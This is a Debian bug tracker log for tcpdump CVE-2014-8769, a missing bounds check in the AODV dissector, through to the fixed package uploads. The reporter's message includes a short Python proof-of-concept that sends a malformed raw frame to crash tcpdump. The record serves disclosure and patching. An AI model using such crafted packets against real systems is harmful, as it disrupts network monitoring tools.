Debian Bug report logs -
#770424
tcpdump: CVE-2014-8769: unreliable output using malformed AOVD payload
Reported by: Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>
Date: Fri, 21 Nov 2014 07:00:01 UTC
Severity: serious
Tags: security, upstream
Found in versions tcpdump/4.6.2-1, tcpdump/4.3.0-1
Fixed in versions tcpdump/4.6.2-2, tcpdump/4.3.0-1+deb7u1, tcpdump/4.1.1-1+deb6u1
Done: Thorsten Alteholz <debian@alteholz.de>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Romain Francoise <rfrancoise@debian.org>:
Bug#770424; Package tcpdump.
(Fri, 21 Nov 2014 07:00:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>:
New Bug report received and forwarded. Copy sent to Romain Francoise <rfrancoise@debian.org>.
(Fri, 21 Nov 2014 07:00:06 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: tcpdump
Version: 4.6.2
tags: Security
Using following script to generate packet:
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
aovd_frame =
"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
s.send(aovd_frame)
#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug reports as CVE-2014-8769.
Propose patch is in attached file. Main idea is checking the length of
available data before print on screen.
The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88
CongNT
[Fix_uncheck_length.patch (text/x-patch, attachment)]
Changed Bug title to 'tcpdump: CVE-2014-8769: unreliable output using malformed AOVD payload' from 'CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload'
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 21 Nov 2014 07:45:12 GMT) (full text, mbox, link).
Added tag(s) upstream.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 21 Nov 2014 07:45:13 GMT) (full text, mbox, link).
Marked as found in versions tcpdump/4.6.2-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 21 Nov 2014 07:45:21 GMT) (full text, mbox, link).
Severity set to 'serious' from 'normal'
Request was from Romain Francoise <rfrancoise@debian.org>
to control@bugs.debian.org.
(Fri, 21 Nov 2014 08:30:04 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org:
Bug#770424; Package tcpdump.
(Fri, 21 Nov 2014 09:15:08 GMT) (full text, mbox, link).
Acknowledgement sent
to Romain Francoise <rfrancoise@debian.org>:
Extra info received and forwarded to list.
(Fri, 21 Nov 2014 09:15:08 GMT) (full text, mbox, link).
Message #18 received at 770424@bugs.debian.org (full text, mbox, reply):
Thanks. Upstream doesn't seem to have released official patches yet, or
if they have they haven't kept me in the loop. I've asked for
clarification on the mailing list.
--
Romain Francoise <rfrancoise@debian.org>
http://people.debian.org/~rfrancoise/
No longer marked as found in versions 4.6.2.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 21 Nov 2014 09:21:16 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Romain Francoise <rfrancoise@debian.org>:
Bug#770424; Package tcpdump.
(Fri, 21 Nov 2014 09:36:19 GMT) (full text, mbox, link).
Acknowledgement sent
to Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>:
Extra info received and forwarded to list. Copy sent to Romain Francoise <rfrancoise@debian.org>.
(Fri, 21 Nov 2014 09:36:20 GMT) (full text, mbox, link).
Message #25 received at 770424@bugs.debian.org (full text, mbox, reply):
Thanks for your information.
I already try on master branch of tcpdump on github, it seems that they
haven't
fixed it yet. Still see segfault message on dmesg.
On 21/11/2014 16:10, Romain Francoise wrote:
> Thanks. Upstream doesn't seem to have released official patches yet, or
> if they have they haven't kept me in the loop. I've asked for
> clarification on the mailing list.
>
--
CongNT
Reply sent
to Romain Francoise <rfrancoise@debian.org>:
You have taken responsibility.
(Sat, 22 Nov 2014 11:09:40 GMT) (full text, mbox, link).
Notification sent
to Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>:
Bug acknowledged by developer.
(Sat, 22 Nov 2014 11:09:40 GMT) (full text, mbox, link).
Message #30 received at 770424-close@bugs.debian.org (full text, mbox, reply):
Source: tcpdump
Source-Version: 4.6.2-2
We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 770424@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Romain Francoise <rfrancoise@debian.org> (supplier of updated tcpdump package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 22 Nov 2014 11:48:08 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.6.2-2
Distribution: unstable
Urgency: high
Maintainer: Romain Francoise <rfrancoise@debian.org>
Changed-By: Romain Francoise <rfrancoise@debian.org>
Closes: 770415 770424 770434
Description:
tcpdump - command-line network traffic analyzer
Changes:
tcpdump (4.6.2-2) unstable; urgency=high
.
* Urgency high due to security fixes.
* Add three patches extracted from various upstream commits fixing
vulnerabilities in three dissectors:
+ CVE-2014-8767: missing bounds checks in OLSR dissector (closes: #770434).
+ CVE-2014-8768: missing bounds checks in Geonet dissector
(closes: #770415).
+ CVE-2014-8769: missing bounds checks in AOVD dissector (closes: #770424).
Checksums-Sha1:
57c8f0416165d208c8ae198dc98356d91afd09a9 1915 tcpdump_4.6.2-2.dsc
7eaa17f35087f264ae326d76b31755f9742cb2b1 16688 tcpdump_4.6.2-2.debian.tar.xz
7a1d0ae5a24ac88460613be7eacfd09780c8a9c4 376982 tcpdump_4.6.2-2_amd64.deb
Checksums-Sha256:
8487b9f862d770d803dcd0c6822c2202312f943492755b4841135a26256f4fc4 1915 tcpdump_4.6.2-2.dsc
0ae5ff1b8513b9218a01d38de2d4009f0f25c1437ba2d94eb4a6c8314466d6d2 16688 tcpdump_4.6.2-2.debian.tar.xz
ce138f564b1d427cdbec57ab626f967da7ba92e9d9411911fdfce0c311aa1c23 376982 tcpdump_4.6.2-2_amd64.deb
Files:
b71ede0c26d7fa4bf8feca523e51efba 1915 net optional tcpdump_4.6.2-2.dsc
4a0c1dd046d8e6d930c4407b6440bcac 16688 net optional tcpdump_4.6.2-2.debian.tar.xz
3d9c3b86c1f252c7fa0c1de43f221077 376982 net optional tcpdump_4.6.2-2_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJUcGwXAAoJEK0V9DXwX5Yt3WsP/1sjl9ezNdLHIhfTdKmfUJP6
xbG69dF5kIF5NgADtbVVcSQ21xMImTyuLPMCp0/mzPgU4G8V0qJIS4D4KmD9oZ/v
vJ0fC4ol5MBY3S6/uUXTJ/xTnFi1qZ/t07Efr1GVFymSHyDxiepSiYY+5fIsYl41
hnhqheKuSQQzU5mlaXDvaVCt8Bek/L1G4B1LbWAwIapkSBcop5e+CSiZ+kp3iVwG
CEyZR5QQLz8WkIzltjqak0fFYtMFim1bg+7/w5KkWCX4pax6GUsOboj364Y1wExz
ffgvAoTu9RQO8DF33ubyuK2Y3VatyxhLNelLQzLXOFyle2Wu5EfCexWEqkMJWFsu
WU9GMA+A3uYpdqZJzu3QJVIp5kG/jSuGWMnY5PLkh45VHZdH89m9d4cEbsd/w2jg
qlYGQj3rQeZcjdfDDRHCNTgAQKDIhn9CYzGphAfgNIbNh45T6WjF6oBGd/H5pBJ3
7GUVMX9nHeURRjnA3R9BICVkthWf25K2Hgq2H3TeOqqwlNdt+X7+SXd7ezzNbpdN
PiI9/WNNNOBqoIh56RKk0i8+tsbdO+QoL/dRPcpCfXvRTY5MPTDq6cJnqReftnXE
obbt0wFYVugIMFwvccVqcQ2OTW6tGqai5RD0bXrn9e9vynFBxgRJNaMjg17Z3Y+C
ETQcMhfhjAjUi4iq9U8B
=Rbni
-----END PGP SIGNATURE-----
Marked as found in versions tcpdump/4.3.0-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Tue, 25 Nov 2014 15:33:11 GMT) (full text, mbox, link).
Reply sent
to Romain Francoise <rfrancoise@debian.org>:
You have taken responsibility.
(Mon, 08 Dec 2014 15:36:06 GMT) (full text, mbox, link).
Notification sent
to Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>:
Bug acknowledged by developer.
(Mon, 08 Dec 2014 15:36:06 GMT) (full text, mbox, link).
Message #37 received at 770424-close@bugs.debian.org (full text, mbox, reply):
Source: tcpdump
Source-Version: 4.3.0-1+deb7u1
We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 770424@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Romain Francoise <rfrancoise@debian.org> (supplier of updated tcpdump package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 29 Nov 2014 18:09:49 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.3.0-1+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: Romain Francoise <rfrancoise@debian.org>
Changed-By: Romain Francoise <rfrancoise@debian.org>
Closes: 770424 770434
Description:
tcpdump - command-line network traffic analyzer
Changes:
tcpdump (4.3.0-1+deb7u1) wheezy-security; urgency=high
.
* Add patches extracted from the upstream tcpdump_4.3 branch fixing
three security issues:
+ CVE-2014-8767: missing bounds checks in the OLSR dissector
(closes: #770434).
+ CVE-2014-8769: missing bounds checks in the AODV dissector
(closes: #770424).
+ CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1:
b34a71db8cbbe8e6943d286f069d8b3cd05f44b6 1931 tcpdump_4.3.0-1+deb7u1.dsc
5d0432e4831ca81633a6c9da732caad77d64a9ac 887619 tcpdump_4.3.0.orig.tar.gz
44b3da0e4f51dc5e5f37310cc8244e32a86194d5 14972 tcpdump_4.3.0-1+deb7u1.debian.tar.xz
25f883fa2d0b7a36925bea91838cc1e54bfe9abc 419898 tcpdump_4.3.0-1+deb7u1_amd64.deb
Checksums-Sha256:
b345b81792830fec740ff616b2b4d5e5a7e6186eb77e3b2f6d1658a1174ff2d4 1931 tcpdump_4.3.0-1+deb7u1.dsc
efd08b610210d39977ec3175fa82dad9fbd33587930081be2a905a712dba4286 887619 tcpdump_4.3.0.orig.tar.gz
4d36e1a9140d3268a0bc1e71d89ee4649c9c1a17002b20078a85720b5673fe23 14972 tcpdump_4.3.0-1+deb7u1.debian.tar.xz
5d46ca857cbdf677a6a00ed1017db49116f181371aaf9f64afa4b4c099573665 419898 tcpdump_4.3.0-1+deb7u1_amd64.deb
Files:
10b6ddd6ebd74e723e5393478585fc25 1931 net optional tcpdump_4.3.0-1+deb7u1.dsc
a3fe4d30ac85ff5467c889ff46b7e1e8 887619 net optional tcpdump_4.3.0.orig.tar.gz
af8927109c537f1650af40c92738d107 14972 net optional tcpdump_4.3.0-1+deb7u1.debian.tar.xz
99224ad04e54b31149295e59cc6fcd05 419898 net optional tcpdump_4.3.0-1+deb7u1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJUfZt3AAoJEK0V9DXwX5YtObsP/1JWhy5kxF2c+d2+BgZkdJQJ
w+OZh4ikIXPyrkkD19Sx3nqc3DDk53cDQQ+Nod+zysIU4jPnHlMkO6A399tv/0Un
O+4jGotAKlwtR2+I5udt99f7fI8MKhZB1LctMtJ+CKA70nvY4EbAGb6RO7a2Bd39
KqdIHL0yMByLNl369j4yEHv36aINREE2JePaPXzS/moNYbuscXc+ol2IVBgncnhb
n9MukbH6Q8M/Dx8PPoq1XL7hlIEB3QA2a8EyYpkqoTyo5ksVvOVdvYjfr3tzv6Fa
E5NQ0iogL6nPfu911O5KE8zzU/i5MXXXBr9Kkw7Ps7clG2Je92o5RW3w40M9hDTK
8RHN8VQ08bw4fp54jZ/YjEOmQZVuMwWCv/HbchDuLmRpjCCPlNPDyhF2YcCVGGlW
RQlRKVbPQN4DMs+8ijBs3/jilksyzIb8mO19jNagm5DS4gOtC2T1ox5P/izFgx3O
c5xLIX+UuV0IEke4EEsjiyeM3FSzGbHlOQPusarSv02l3oJPBO2gtFi4opYWecY6
aX7ro9cuIUZIztaeiJdIQD6oZsGeaOs6Lovs9TwnsJ9dONp/xV68G0FCG2i4Dors
wsROBPxQGG5Bn35X+i4lDHRhuox/M6breIl2Yk5MhhFb9GUgvyqv0qP+O4A1BOJM
J6JKdubEEpEwK31xG7We
=cR7Z
-----END PGP SIGNATURE-----
Reply sent
to Thorsten Alteholz <debian@alteholz.de>:
You have taken responsibility.
(Mon, 08 Dec 2014 18:36:20 GMT) (full text, mbox, link).
Notification sent
to Nguyen Cong <cong.nguyenthe@toshiba-tsdv.com>:
Bug acknowledged by developer.
(Mon, 08 Dec 2014 18:36:20 GMT) (full text, mbox, link).
Message #42 received at 770424-close@bugs.debian.org (full text, mbox, reply):
Source: tcpdump
Source-Version: 4.1.1-1+deb6u1
We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 770424@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thorsten Alteholz <debian@alteholz.de> (supplier of updated tcpdump package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 08 Dec 2014 18:17:14 +0100
Source: tcpdump
Binary: tcpdump
Architecture: source i386
Version: 4.1.1-1+deb6u1
Distribution: squeeze-lts
Urgency: low
Maintainer: Romain Francoise <rfrancoise@debian.org>
Changed-By: Thorsten Alteholz <debian@alteholz.de>
Description:
tcpdump - A powerful tool for network monitoring and data acquisition
Closes: 770424 770434
Changes:
tcpdump (4.1.1-1+deb6u1) squeeze-lts; urgency=low
.
* Non-maintainer upload by the Squeeze LTS Team.
* Add patches extracted from the upstream tcpdump_4.3 branch fixing
three security issues:
+ CVE-2014-8767: missing bounds checks in the OLSR dissector
(closes: #770434).
+ CVE-2014-8769: missing bounds checks in the AODV dissector
(closes: #770424).
+ CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1:
30fbfb11e5f2fc75b5552ef857b18f57386c5911 2006 tcpdump_4.1.1-1+deb6u1.dsc
8f356cbc781192ecb527623d68db90e06aa9d4b9 1587392 tcpdump_4.1.1.orig.tar.gz
0e1f60287770c218c8ba4f9dbde1bd19c3c28a78 17106 tcpdump_4.1.1-1+deb6u1.debian.tar.gz
c563dfbc0b3804751dbd07ea59cc3e002062d024 377242 tcpdump_4.1.1-1+deb6u1_i386.deb
Checksums-Sha256:
e6b815a7c65a4b13981e79caa8136ec1fb7d77aa455d35d6238c5cdc6d32e93e 2006 tcpdump_4.1.1-1+deb6u1.dsc
e6cd4bbd61ec7adbb61ba8352c4b4734f67b8caaa845d88cb826bc0b9f1e7f0a 1587392 tcpdump_4.1.1.orig.tar.gz
3b7b0104f1bbb9b874ece0830764b4b629fc65c3c47b03657733b0046f47928f 17106 tcpdump_4.1.1-1+deb6u1.debian.tar.gz
186f6ce0d68aa25382ec656c8a644195df7ad0b2ac6ac3fca0791ca6ac66946b 377242 tcpdump_4.1.1-1+deb6u1_i386.deb
Files:
60c38fabe1f4252db2aa17859389aded 2006 net optional tcpdump_4.1.1-1+deb6u1.dsc
d0dd58bbd6cd36795e05c6f1f74420b0 1587392 net optional tcpdump_4.1.1.orig.tar.gz
f85bacca750d3133766f9f56c90b874a 17106 net optional tcpdump_4.1.1-1+deb6u1.debian.tar.gz
330f9dccabd9cb37cf8d2a3c22d19ba7 377242 net optional tcpdump_4.1.1-1+deb6u1_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQJ8BAEBCgBmBQJUhevrXxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w
ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ2MjAxRkJGRkRCQkRFMDc4MjJFQUJCOTY5
NkZDQUMwRDM4N0I1ODQ3AAoJEJb8rA04e1hHJ9MQAIX4/3GanNHhDeuOUJPdQwov
ev9X1byyQg8k+qqBxU3zq6WIfqu6T96Z4uEmrlpMcDGrdsKbGauZN/KoO0THfy20
/b/GzL8InoTIGsqa+RQbEIU+zIJsmtsF+OHzWhnBOMc5tiuIQxSocdOtjpg6HeTU
dXntSeb0IZWw3HgTOtsJo1eDZhydacMfGFOk5RxEsyMEBzhoZArqS8+4wMEzX6w1
1dLDx/9tNBOk8GcirZGyQ7q9qv7dEpgatqajxS8GCHZgD0i0j5Ur9j6NL/fhhHfo
bKC8j5ONNUKZuDElDYSptJn42MLCMwKIvLhJC5PeUNl958Ii6TmIprsphLIyMTbk
YKSOhQHafJFUgFro9M1koy7qhhnyq5nbhUupv+yhI4+Vedt13fciSAaDsuEUWTlE
/EcttReM+DtsoInDHLryB9+aKdBI25Y3LHo7U2X2e81pKPe1InQu+crbxnCAt1c/
6j/uWYNxrb5JnCzF9RtSqEgEO3YMpG2zpXDPKsnAQcFYYCXQB+PIoaCWX1xvK/t9
imDC1bw0lYN9DG01txow/znaHv1LYIe8eb5ShuSPwHoimclEVfLHYV47o55RUw6S
jWrJOAlp4crrAhEly3bof3gBfruO0iJdBEouNrn28x2SUoZQKezLf+gLyd1GRH8z
ym21gmVruJNNhDgnwDg8
=rE9Q
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 11 Jan 2015 07:27:08 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 18:03:33 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon